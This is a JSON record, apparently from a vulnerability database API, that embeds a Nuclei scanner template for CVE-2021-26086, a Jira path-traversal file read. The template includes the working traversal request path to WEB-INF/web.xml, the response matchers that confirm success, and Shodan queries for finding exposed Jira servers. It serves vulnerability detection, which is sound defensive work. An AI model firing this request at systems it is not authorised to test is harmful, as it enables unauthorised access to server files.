{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-26086/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-26086/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-26086/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-26086/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-26086/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-26086"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-26086"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-26086.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2021-26086\n\ninfo:\n  name: Atlassian Jira Limited - Local File Inclusion\n  author: cocxanh\n  severity: medium\n  description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.\n  impact: |\n    This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading to a complete compromise of the affected system.\n  remediation: |\n    Apply the latest security patches and updates provided by Atlassian to mitigate this vulnerability.\n  reference:\n    - https://jira.atlassian.com/browse/JRASERVER-72695\n    - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-26086\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/Jeromeyoung/CVE-2021-26086\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2021-26086\n    cwe-id: CWE-22\n    epss-score: 0.99999\n    epss-percentile: 0.99992\n    cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: atlassian\n    product: jira_data_center\n    shodan-query:\n      - http.component:\"Atlassian Jira\"\n      - http.component:\"atlassian jira\"\n  tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - <web-app\n          - </web-app>\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022068ce4ba81a6376df2961bdc2ba2d821396f3f7ab1774b701b9b4a20d181a1f6f022042a178f5a7a43842849c39d5c41c792a42f2b016dcf37554ff30483a406cd349:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-26086"
}